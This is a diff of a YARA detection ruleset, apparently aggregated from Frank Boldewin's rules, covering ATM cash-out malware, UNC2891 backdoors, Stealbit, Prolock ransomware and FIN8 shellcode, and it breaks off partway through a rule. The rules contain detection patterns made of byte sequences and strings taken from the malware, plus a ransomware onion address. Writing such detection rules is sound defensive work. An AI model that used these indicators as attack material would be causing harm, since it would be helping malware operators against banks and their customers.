"5c09f6ebb7243994ddc466058d5dc9920a5fced5e843200b1f057bda087b8ba6" strings: - $pattern1 = { FC B2 80 31 DB A4 B3 02 } - $pattern2 = { AC D1 E8 74 ?? 11 C9 EB } - $pattern3 = { 73 0A 80 FC 05 73 ?? 83 F8 7F 77 } + $ParseImgExportDir = { 8B 50 3C 03 D0 8B 52 78 03 D0 8B 4A 1C 03 C8 } + $djb2Hashing = { 8B 75 08 BA 05 15 00 00 8B C2 C1 E2 05 03 D0 33 DB 8A 1E 03 D3 46 33 DB 8A 1E 85 DB 75 } condition: - filesize <10MB and all of them + uint16(0)==0x5a4d and all of them } rule R3C0NST_UNC2891_Winghook : FILE { @@ -111158,67 +111405,65 @@ rule R3C0NST_UNC2891_Winghook : FILE condition: uint32(0)==0x464c457f and filesize <100KB and 1 of ($code*) and all of ($str*) } -rule R3C0NST_ATM_Malware_Javadispcash : FILE +import "pe" + +rule R3C0NST_ATM_CINEO4060_Blackbox : FILE { meta: - description = "Detects ATM Malware JavaDispCash" + description = "Detects Malware samples for Diebold Nixdorf CINEO 4060 ATMs used in blackboxing attacks across Europe since May 2021" author = "Frank Boldewin (@r3c0nst)" - id = "606d1cb6-7879-569e-ac36-1e2f6a446dc1" - date = "2019-03-28" - modified = "2019-03-28" - reference = "https://twitter.com/r3c0nst/status/1111254169623674882" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Mal.JavaDispCash.yar#L1-L20" + id = "8fa26e1c-2931-59c8-9cec-20dc6684b8d6" + date = "2021-05-25" + modified = "2022-06-21" + reference = "https://twitter.com/r3c0nst/status/1539036442516660224" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM_CINEO4060_Blackbox.yar#L3-L27" license_url = "N/A" - logic_hash = "dd7c2ccc85038f3ba563f7f814c03668448b292fde36bcf9d06bf20fd341526f" + logic_hash = "80b919d03c1b9a198611994eaf2fafaf8254c73a6f0edb53b2b3eb90ea70d915" score = 75 - quality = 74 + quality = 90 tags = "FILE" - hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027" - hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa" strings: - $CashInfo = "getNumberOfCashUnits" nocase ascii wide - $Dispense = "waitforbillstaken" nocase ascii wide - $Inject = "No code to inject!" nocase ascii wide - $config = ".Agentcli" nocase ascii wide - $log1 = "logft.log" nocase ascii wide - $log2 = ".loginside" nocase ascii wide + $MyAgent1 = "javaagentsdemo/ClassListingTransformer.class" ascii fullword + $MyAgent2 = "javaagentsdemo/MyUtils.class" ascii fullword + $MyAgent3 = "javaagentsdemo/SimplestAgent.class" ascii fullword + $Hook = "### [HookAPI]: Switching context!" fullword ascii + $Delphi = "Borland\\Delphi\\RTL" fullword ascii + $WMIHOOK1 = "TPM_SK.DLL" fullword ascii + $WMIHOOK2 = "GetPCData" fullword ascii + $WMIHOOK3 = {60 9C A3 E4 2B 41 00 E8 ?? ?? ?? ?? 9D 61 B8 02 00 00 00 C3} + $TRICK1 = "USERAUTH.DLL" fullword ascii + $TRICK2 = "GetAllSticksByID" fullword ascii + $TRICK3 = {6A 06 8B 45 FC 8B 00 B1 4F BA 1C 00 00 00} condition: - uint16(0)==0x4B50 and filesize <500KB and all of them + ( uint16(0)==0x4b50 and filesize <50KB and all of ($MyAgent*)) or ( uint16(0)==0x5A4D and (pe.characteristics&pe.DLL) and $Hook and $Delphi and all of ($WMIHOOK*) or all of ($TRICK*)) } -rule R3C0NST_ATM_Malware_XFSADM : FILE +rule R3C0NST_UNC2891_Steelcorgi : FILE { meta: - description = "Detects ATM Malware XFSADM" + description = "Detects UNC2891 Steelcorgi packed ELF binaries" author = "Frank Boldewin (@r3c0nst)" - id = "57124fef-73a1-5978-b165-b1b7d7c1196e" - date = "2019-06-21" - modified = "2019-07-11" - reference = "https://twitter.com/r3c0nst/status/1149043362244308992" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSADM.yar#L1-L24" + id = "94da7da5-5fc3-5221-97d6-1854aa7b1959" + date = "2022-03-30" + modified = "2023-01-05" + reference = "https://github.com/fboldewin/YARA-rules/" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Steelcorgi.yar#L1-L17" license_url = "N/A" - logic_hash = "2dd0b9e0a2dd18725c9342a234520c96c6b30cf3ce7196562b2380a39f5f8673" + logic_hash = "4f956b9eaec66bc606ffd0afa2fe9303194e9a8c12d4c3de6ab2334c9856dd99" score = 75 - quality = 84 + quality = 90 tags = "FILE" - hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d" + hash1 = "0760cd30d18517e87bf9fd8555513423db1cd80730b47f57167219ddbf91f170" + hash2 = "3560ed07aac67f73ef910d0b928db3c0bb5f106b5daee054666638b6575a89c5" + hash3 = "5b4bb50055b31dbd897172583c7046dd27cd03e1e3d84f7a23837e8df7943547" strings: - $Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15} - $Code2 = {68 98 01 00 00 50 FF 15} - $Mutex = "myXFSADM" nocase wide - $MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" nocase ascii - $XFSCommand1 = "WfsExecute" nocase ascii - $XFSCommand2 = "WfsGetInfo" nocase ascii - $PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" nocase ascii - $WindowName = "XFS ADM" nocase wide - $FindWindow = "ADM rec" nocase wide - $LogFile = "xfs.log" nocase ascii - $TmpFile = "~pipe.tmp" nocase ascii + $pattern1 = {70 61 64 00 6C 63 6B 00} + $pattern2 = {FF 72 FF 6F FF 63 FF 2F FF 73 FF 65 FF 6C FF 66 FF 2F FF 65 FF 78 FF 65} condition: - uint16(0)==0x5A4D and filesize <500KB and 4 of them + uint32(0)==0x464c457f and all of them } rule R3C0NST_Exploit_Outlook_CVE_2023_23397 : CVE_2023_23397 FILE { @@ -111256,77 +111501,29 @@ rule R3C0NST_Exploit_Outlook_CVE_2023_23397 : CVE_2023_23397 FILE condition: (( uint32be(0)==0xD0CF11E0 or uint32be(0)==0x789F3E22) or ( all of ($mail*))) and (($ipmtask or $ipmappointment) or ($ipmtaskb64 or $ipmappointmentb64)) and (($unc_path1 or $unc_path2) or ($unc_a or $unc_w)) } -rule R3C0NST_ATM_Malware_Dispcashbr : FILE -{ - meta: - description = "Detects ATM Malware DispCashBR" - author = "Frank Boldewin (@r3c0nst)" - id = "17d22120-0ca2-5b27-9816-21ab4a6fb20c" - date = "2020-02-27" - modified = "2020-08-17" - reference = "https://twitter.com/r3c0nst/status/1232944566208286720" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispCashBR.yar#L1-L21" - license_url = "N/A" - logic_hash = "3fb5d62cb779ddc13e9b938290dfa9d2a3353d7969e639a662c1bcaca945de4d" - score = 75 - quality = 90 - tags = "FILE" - hash1 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036" - - strings: - $String1 = "(*) Dispensando: %lu" ascii nocase - $String2 = "COMANDO EXECUTADO COM SUCESSO" ascii nocase - $String3 = "[+] FOI SACADO: %lu R$ [+]" ascii nocase - $DbgStr1 = "_Get_Information_cdm_cuinfo" ascii nocase - $DbgStr2 = "_GET_INFORMATION_SHUTTER" ascii nocase - $Code1 = {C7 44 24 08 00 00 00 00 C7 44 24 04 2F 01 00 00 89 04 24 E8} - $Code2 = {C7 44 24 08 00 00 00 00 C7 44 24 04 17 05 00 00 89 04 24 E8} - $Code3 = {89 4C 24 08 C7 44 24 04 2E 01 00 00 89 04 24 E8} - - condition: - uint16(0)==0x5A4D and filesize <100KB and 2 of ($String*) and 1 of ($DbgStr*) and all of ($Code*) -} -rule R3C0NST_ATM_Malware_XFS_DIRECT : FILE +rule R3C0NST_Shellcode_Apihashing_FIN8 { meta: - description = "Detects ATM Malware XFS_DIRECT" + description = "Detects FIN8 Shellcode APIHashing" author = "Frank Boldewin (@r3c0nst)" - id = "d1551c50-d3d2-56fd-a6b7-198d3a26ac72" - date = "2019-10-18" - modified = "2019-10-19" - reference = "https://twitter.com/r3c0nst/status/1185237040583106560" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFS_DIRECT.yar#L1-L37" + id = "a5b4a925-c4cc-5d3a-a2f1-3372f77ceea2" + date = "2021-03-16" + modified = "2021-03-25" + reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Shellcode.APIHashing.FIN8.yar#L1-L74" license_url = "N/A" - logic_hash = "844a334d0eb8516c0ef3780e48e3dbc8e23d41c80bdff10f01407b775e72709e" + logic_hash = "958d6a3c0c78ad22fb56896d6a97b9fe79c56813dc36a37385f3ce5621008624" score = 75 quality = 90 - tags = "FILE" - hash1 = "3e023949fecd5d06b3dff9e86e6fcac6a9ec6c805b93118db43fb4e84fe43ee0" - hash2 = "303f2a19b286ca5887df2a334f22b5690dda9f092e677786e2a8879044d8ad11" - hash3 = "15d50938e51ee414124314095d3a27aa477f40413f83d6a2b2a2007efc5a623a" - hash4 = "0f9cb4dc1ac2777be30145c3271c95a027758203d0de245ec390037f7325d79d" - hash5 = "141ae291ddae60fd1b232f543bc9b40f3a083521cd7330c427bb8fc5cdd23966" - hash6 = "66eb1a8134576db05382109eec7e297149f25a021aba5171d2f99aa49c381456" - hash7 = "ac20b12beefb2036595780aaf7ec29203e2e09b6237d93cd26eaa811cebd6665" - hash8 = "901fc474f50eb62edc526593208a7eec4df694e342ffc5b895d1dcec953c6899" - hash9 = "56548c26741b25b15c27a0de498c5e04c69b0c9250ba35e3a578bc2f05eedd07" - hash10 = "c89f1d562983398ab2d6dd75e4e30cc0e95eab57cdf48c4a17619dca9ecc0748" + tags = "" strings: - $EncLayer1 = {0F B6 51 FC 30 50 FF 0F B6 11 30 10 0F B6 51 04 30 50 01 0F B6 51 08 30 50 02} - $EncLayer2 = {B8 4D 5A 00 00 89 33 66 39 06 75 ?? 8b ?? 3c} - $String1 = "NOW ENTER MASTER KEY" ascii nocase - $String2 = "Closing app, than delete myself." ascii nocase - $String3 = "Number of phisical cash units is:" ascii nocase - $String4 = "COULD NOT ENABLE or DISABLE connection" ascii nocase - $String5 = "XFS_DIRECT" ascii nocase - $String6 = "Take the money you snicky mother fucker :)" ascii nocase - $String7 = "ATM IS TEMPORARILY OUT OF SERVICE!" wide nocase - $Code1 = {D1 F8 89 44 24 10 DB 44 24 10 DC 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 35 2F 81 0B 00 A3} - $Code2 = {8B ?? ?? ?? 68 2E 01 00 00 52 C7 ?? 06 01 00 00 00} + $APIHashing32bit1 = {68 F2 55 03 88 68 65 19 6D 1E} + $APIHashing32bit2 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4} + $APIHashing64bit = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21} condition: - uint16(0)==0x5A4D and ( filesize <1500KB and all of ($EncLayer*)) or ( filesize <300KB and 4 of ($String*) and all of ($Code*)) + all of ($APIHashing32bit*) or $APIHashing64bit } import "pe" @@ -111362,120 +111559,143 @@ rule R3C0NST_Nighthawk_RAT : FILE condition: uint16(0)==0x5A4D and filesize <2MB and (3 of ($pattern*) or (pe.section_index(".profile") and pe.section_index(".detourc") and pe.section_index(".detourd"))) } +rule R3C0NST_UNC2891_Slapstick : FILE +{ + meta: + description = "Detects UNC2891 Slapstick pam backdoor" + author = "Frank Boldewin (@r3c0nst)" + id = "a731acff-f657-5877-859e-7447230576df" + date = "2022-03-30" + modified = "2023-01-05" + reference = "https://github.com/fboldewin/YARA-rules/" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Slapstick.yar#L1-L19" + license_url = "N/A" + logic_hash = "7777c3b850f5b7ee326be5461ebc3bf37fb201b67ada78b50575fb31f50adf9a" + score = 75 + quality = 90 + tags = "FILE" + hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789" + + strings: + $code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5} + $code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85} + $str1 = "/proc/self/exe" fullword ascii + $str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii + $str3 = "pam_sm_authenticate" ascii + $str4 = "ACCESS GRANTED & WELCOME" xor + + condition: + uint32(0)==0x464c457f and filesize <100KB and ( all of ($code*) or all of ($str*)) +} import "hash" -rule R3C0NST_ATM_Malware_Atmspitter : FILE +rule R3C0NST_ATM_Malware_Dispenserxfs : FILE { meta: - description = "Detects ATM Malware ATMSpitter" - author = "Frank Boldewin (@r3c0nst)" - id = "4497f304-6f04-5f5d-91ba-9124e5262078" - date = "2016-07-20" - modified = "2019-03-29" - reference = "https://topics.amcham.com.tw/2017/02/looking-back-at-the-first-banks-atm-heist/" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMSpitter.yar#L3-L21" + description = "No description has been set in the source file - R3c0nst" + author = "Frank Boldewin" + id = "52b1aa57-283b-54d7-bd1b-fb5da5f8d269" + date = "2019-02-28" + modified = "2019-02-28" + reference = "https://github.com/fboldewin/YARA-rules/" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispenserXFS.yar#L3-L13" license_url = "N/A" - hash = "658b0502b53f718bd0611a638dfd5969" - logic_hash = "684820ed29c50a41bd262862cb97c70c0cbb8554e7e4be300986519423249c50" + logic_hash = "0e588e2ba03d5eb750183600cce278e791a71f86fbf933ba9d7fda352bd37e2f" score = 75 - quality = 65 + quality = 59 tags = "FILE" strings: - $Code_Bytes = { B9 E0 07 00 00 66 ?? ?? ?? ?? 0F 85 DD 02 00 00 66 ?? ?? ?? ?? ?? 0F 85 D1 02 00 00 } - $Service = "Congratulations! You are very skilled in reverse engineering!" nocase ascii + $Code_Bytes = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 } + $XFSKILL = "injected mxsfs killer into" nocase ascii wide + $PDB = "C:\\_bkittest\\dispenser\\Release_noToken\\dispenserXFS.pdb" nocase ascii wide condition: - (hash.sha256(0, filesize )=="4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958") or ($Code_Bytes and $Service) + (hash.sha256(0, filesize )=="867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a") or ( uint16(0)==0x5A4D and 1 of them ) } -rule R3C0NST_UNC2891_Steelcorgi : FILE +rule R3C0NST_Stealbit : FILE { meta: - description = "Detects UNC2891 Steelcorgi packed ELF binaries" + description = "Detects Stealbit used by Lockbit 2.0 Ransomware Gang" author = "Frank Boldewin (@r3c0nst)" - id = "94da7da5-5fc3-5221-97d6-1854aa7b1959" - date = "2022-03-30" - modified = "2023-01-05" - reference = "https://github.com/fboldewin/YARA-rules/" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Steelcorgi.yar#L1-L17" + id = "07b466cb-92b3-51f2-a702-2930bb7038c6" + date = "2021-08-12" + modified = "2021-08-12" + reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Lockbit2.Stealbit.yar" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Lockbit2.Stealbit.yar#L1-L15" license_url = "N/A" - logic_hash = "4f956b9eaec66bc606ffd0afa2fe9303194e9a8c12d4c3de6ab2334c9856dd99" + logic_hash = "e5f770cc5887f09af0c5550073d51b9e5ffa9dcfa4db6b77bb28643f0f6224fb" score = 75 quality = 90 tags = "FILE" - hash1 = "0760cd30d18517e87bf9fd8555513423db1cd80730b47f57167219ddbf91f170" - hash2 = "3560ed07aac67f73ef910d0b928db3c0bb5f106b5daee054666638b6575a89c5" - hash3 = "5b4bb50055b31dbd897172583c7046dd27cd03e1e3d84f7a23837e8df7943547" + hash1 = "3407f26b3d69f1dfce76782fee1256274cf92f744c65aa1ff2d3eaaaf61b0b1d" + hash2 = "bd14872dd9fdead89fc074fdc5832caea4ceac02983ec41f814278130b3f943e" strings: - $pattern1 = {70 61 64 00 6C 63 6B 00} - $pattern2 = {FF 72 FF 6F FF 63 FF 2F FF 73 FF 65 FF 6C FF 66 FF 2F FF 65 FF 78 FF 65} + $C2Decryption = {33 C9 8B C1 83 E0 0F 8A 80 ?? ?? ?? ?? 30 81 ?? ?? ?? ?? 41 83 F9 7C 72 E9 E8} condition: - uint32(0)==0x464c457f and all of them + uint16(0)==0x5A4D and filesize <100KB and $C2Decryption } import "pe" -rule R3C0NST_ATM_CINEO4060_Blackbox : FILE +rule R3C0NST_ATM_Malware_ATMITCH : FILE { meta: - description = "Detects Malware samples for Diebold Nixdorf CINEO 4060 ATMs used in blackboxing attacks across Europe since May 2021" + description = "Detects ATM Malware ATMItch" author = "Frank Boldewin (@r3c0nst)" - id = "8fa26e1c-2931-59c8-9cec-20dc6684b8d6" - date = "2021-05-25" - modified = "2022-06-21" - reference = "https://twitter.com/r3c0nst/status/1539036442516660224" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM_CINEO4060_Blackbox.yar#L3-L27" + id = "4d7e9615-9db6-5fc7-b95e-b8c7b2c034a8" + date = "2019-03-18" + modified = "2019-03-18" + reference = "https://github.com/fboldewin/YARA-rules/" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMItch.yar#L3-L14" license_url = "N/A" - logic_hash = "80b919d03c1b9a198611994eaf2fafaf8254c73a6f0edb53b2b3eb90ea70d915" + logic_hash = "4278cbcd8c465ba57b65a166e0bd48dcc73eae8660972478d3116bc0d73cf3c4" score = 75 - quality = 90 + quality = 82 tags = "FILE" strings: - $MyAgent1 = "javaagentsdemo/ClassListingTransformer.class" ascii fullword - $MyAgent2 = "javaagentsdemo/MyUtils.class" ascii fullword - $MyAgent3 = "javaagentsdemo/SimplestAgent.class" ascii fullword - $Hook = "### [HookAPI]: Switching context!" fullword ascii - $Delphi = "Borland\\Delphi\\RTL" fullword ascii - $WMIHOOK1 = "TPM_SK.DLL" fullword ascii - $WMIHOOK2 = "GetPCData" fullword ascii - $WMIHOOK3 = {60 9C A3 E4 2B 41 00 E8 ?? ?? ?? ?? 9D 61 B8 02 00 00 00 C3} - $TRICK1 = "USERAUTH.DLL" fullword ascii - $TRICK2 = "GetAllSticksByID" fullword ascii - $TRICK3 = {6A 06 8B 45 FC 8B 00 B1 4F BA 1C 00 00 00} + $STRING1 = "SCREEN and think what does you DO" nocase ascii wide + $STRING2 = "Receive CASH UNIT info first, then LOOK on" nocase ascii wide + $STRING3 = "Unknown command mnemonic, check it and repeat again" nocase ascii wide + $STRING4 = "Catch some money, bitch!" nocase ascii wide condition: - ( uint16(0)==0x4b50 and filesize <50KB and all of ($MyAgent*)) or ( uint16(0)==0x5A4D and (pe.characteristics&pe.DLL) and $Hook and $Delphi and all of ($WMIHOOK*) or all of ($TRICK*)) + ( uint16(0)==0x5A4D and 1 of them ) or (pe.imphash()=="655ad5439db0832c5a3f86d0a68ddaac") } -rule R3C0NST_Prolock_Malware : FILE +rule R3C0NST_ATM_Malware_XFSADM : FILE { meta: - description = "Detects Prolock malware in encrypted and decrypted mode" + description = "Detects ATM Malware XFSADM" author = "Frank Boldewin (@r3c0nst)" - id = "1440b5f5-f1e7-522e-8852-84c326858bb9" - date = "2020-05-17" - modified = "2020-05-20" - reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Prolock.Malware.yar#L1-L20" + id = "57124fef-73a1-5978-b165-b1b7d7c1196e" + date = "2019-06-21" + modified = "2019-07-11" + reference = "https://twitter.com/r3c0nst/status/1149043362244308992" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSADM.yar#L1-L24" license_url = "N/A" - logic_hash = "7502011eba1e36c8ec699f1b627c4980cc3009bb43c5aa5a58571330e93211ea" + logic_hash = "2dd0b9e0a2dd18725c9342a234520c96c6b30cf3ce7196562b2380a39f5f8673" score = 75 - quality = 90 + quality = 84 tags = "FILE" - hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0" - hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178" + hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d" strings: - $DecryptionRoutine1 = {31 04 1A 81 3C 1A 90 90 90 90 74} - $DecryptionRoutine2 = {83 C3 04 81 3C 1A C4 C4 C4 C4 74} - $DecryptedString1 = "support981723721@protonmail.com" nocase ascii - $DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii - $DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii - $CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E} + $Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15} + $Code2 = {68 98 01 00 00 50 FF 15} + $Mutex = "myXFSADM" nocase wide + $MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" nocase ascii + $XFSCommand1 = "WfsExecute" nocase ascii + $XFSCommand2 = "WfsGetInfo" nocase ascii + $PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" nocase ascii + $WindowName = "XFS ADM" nocase wide + $FindWindow = "ADM rec" nocase wide + $LogFile = "xfs.log" nocase ascii + $TmpFile = "~pipe.tmp" nocase ascii condition: - (( uint16(0)==0x5A4D) or ( uint16(0)==0x4D42)) and filesize <100KB and all of ($DecryptionRoutine*) or (1 of ($DecryptedString*) and $CryptoCode) + uint16(0)==0x5A4D and filesize <500KB and 4 of them } rule R3C0NST_ATM_Malware_Ripper : ATMRIPPER MALWARE FILE { @@ -111506,6 +111726,95 @@ rule R3C0NST_ATM_Malware_Ripper : ATMRIPPER MALWARE FILE condition: uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and 2 of ($Card_Hash*) and all of ($Code_Bytes*) and filesize <400KB and ($Service in (0x2f000..0x30000)) } +rule R3C0NST_ATM_Malware_Xfscashncr : FILE +{ + meta: + description = "Detects ATM Malware XFSCashNCR" + author = "Frank Boldewin (@r3c0nst)" + id = "8886cd00-4f4a-5f25-99e0-0806f5e1b4b4" + date = "2019-08-28" + modified = "2019-08-28" + reference = "https://twitter.com/r3c0nst/status/1166773324548063232" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSCashNCR.yar#L1-L21" + license_url = "N/A" + logic_hash = "87f197058d4b515cb4829b5e403a96b88eb95cda81e53a9e1484df8c743d8c4a" + score = 75 + quality = 90 + tags = "FILE" + hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0" + + strings: + $Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8} + $Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8} + $StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii + $StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii + $StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii + $StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii + $PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii + $LogFile = "XfsLog.txt" nocase ascii + + condition: + uint16(0)==0x5A4D and filesize <1500KB and 4 of them +} +rule R3C0NST_ATM_Malware_XFS_ALICE : FILE +{ + meta: + description = "Detects ATM Malware ALICE" + author = "Frank Boldewin (@r3c0nst)" + id = "6132730c-4684-517a-b90d-98ed250e2cba" + date = "2020-01-09" + modified = "2020-08-17" + reference = "https://twitter.com/r3c0nst/status/1215265889844637696" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ALICE.yar#L1-L22" + license_url = "N/A" + logic_hash = "7dca049f024f09c2e778b0693a1015d1fc5a006fc564de914e85231cb5d73da3" + score = 75 + quality = 90 + tags = "FILE" + hash1 = "6b2fac8331e4b3e108aa829b297347f686ade233b24d94d881dc4eff81b9eb30" + + strings: + $String1 = "Project Alice" ascii nocase + $String2 = "Can't dispense requested amount." ascii nocase + $String3 = "Selected cassette is unavailable" ascii nocase + $String4 = "ATM update manager" wide nocase + $String5 = "Input PIN-code for access" wide nocase + $String6 = "Supervisor ID" wide nocase + $Code1 = {50 68 08 07 00 00 6A 00 FF 75 0C FF 75 08 E8} + $Code2 = {50 6A 00 FF 75 10 FF 75 0C FF 75 08 E8} + $Code3 = {68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 0B C0 75 29 6A} + + condition: + uint16(0)==0x5A4D and filesize <200KB and 4 of ($String*) and all of ($Code*) +} +import "pe" + +rule R3C0NST_ATM_Malware_Ploutusi : FILE +{ + meta: + description = "Detects Ploutus I .NET samples based on MetabaseQ report" + author = "Frank Boldewin (@r3c0nst)" + id = "02104112-6f81-5d19-935d-45cfcd2fa41c" + date = "2021-03-03" + modified = "2021-03-04" + reference = "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ploutus-I.yar#L3-L26" + license_url = "N/A" + logic_hash = "77100d300a40219187f5c4b8270f599a91652b69980fe450b791181b8c30b5a4" + score = 75 + quality = 90 + tags = "FILE" + hash1 = "4f6d4c6f97caf888a98a3097b663055b63e605f15ea8f7cc7347283a0b8424c1" + hash2 = "8ca29597152dc79bcf79394e1ae2635b393d844bb0eeef6709d37e6778457b31" + hash3 = "dce1f01c08937fb5c98964a0911de403eed2101a9d46c5eb9899755c40c3765a" + hash4 = "3a1d992277a862640a0835af9dff4b029cfc6c5451e9716f106efaf07702a98c" + + strings: + $Code = {28 ?? 02 00 06 2a} + + condition: + filesize <300KB and $Code and pe.pdb_path contains "Diebold.pdb" and pe.imports("mscoree.dll","_CorExeMain") and ( for any i in (0..pe.number_of_resources-1) : (pe.resources[i].type==pe.RESOURCE_TYPE_VERSION and (pe.version_info["InternalName"] contains "Diebold.exe"))) +} rule R3C0NST_UNC2891_Caketap { meta: @@ -111531,76 +111840,114 @@ rule R3C0NST_UNC2891_Caketap condition: uint32(0)==0x464c457f and ( all of ($code*) or ( all of ($str*) and #str2==2)) } -rule R3C0NST_Ransomware_Germanwiper : FILE +rule R3C0NST_ATM_Malware_XFS_DIRECT : FILE { meta: - description = "Detects RansomWare GermanWiper in Memory or in unpacked state" + description = "Detects ATM Malware XFS_DIRECT" author = "Frank Boldewin (@r3c0nst)" - id = "ea71849e-62a1-5b4d-9cf7-0728192361cc" - date = "2019-08-05" - modified = "2019-08-05" - reference = "https://twitter.com/r3c0nst/status/1158326526766657538" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Ransomware.Germanwiper.yar#L1-L25" + id = "d1551c50-d3d2-56fd-a6b7-198d3a26ac72" + date = "2019-10-18" + modified = "2019-10-19" + reference = "https://twitter.com/r3c0nst/status/1185237040583106560" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFS_DIRECT.yar#L1-L37" license_url = "N/A" - logic_hash = "563ad59abd09d9a5fcfcf5ed48dc1e3c48b4bb198c20721d5af531da20d2b0d3" + logic_hash = "844a334d0eb8516c0ef3780e48e3dbc8e23d41c80bdff10f01407b775e72709e" score = 75 quality = 90 tags = "FILE" - hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c" - hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447" + hash1 = "3e023949fecd5d06b3dff9e86e6fcac6a9ec6c805b93118db43fb4e84fe43ee0" + hash2 = "303f2a19b286ca5887df2a334f22b5690dda9f092e677786e2a8879044d8ad11" + hash3 = "15d50938e51ee414124314095d3a27aa477f40413f83d6a2b2a2007efc5a623a" + hash4 = "0f9cb4dc1ac2777be30145c3271c95a027758203d0de245ec390037f7325d79d" + hash5 = "141ae291ddae60fd1b232f543bc9b40f3a083521cd7330c427bb8fc5cdd23966" + hash6 = "66eb1a8134576db05382109eec7e297149f25a021aba5171d2f99aa49c381456" + hash7 = "ac20b12beefb2036595780aaf7ec29203e2e09b6237d93cd26eaa811cebd6665" + hash8 = "901fc474f50eb62edc526593208a7eec4df694e342ffc5b895d1dcec953c6899" + hash9 = 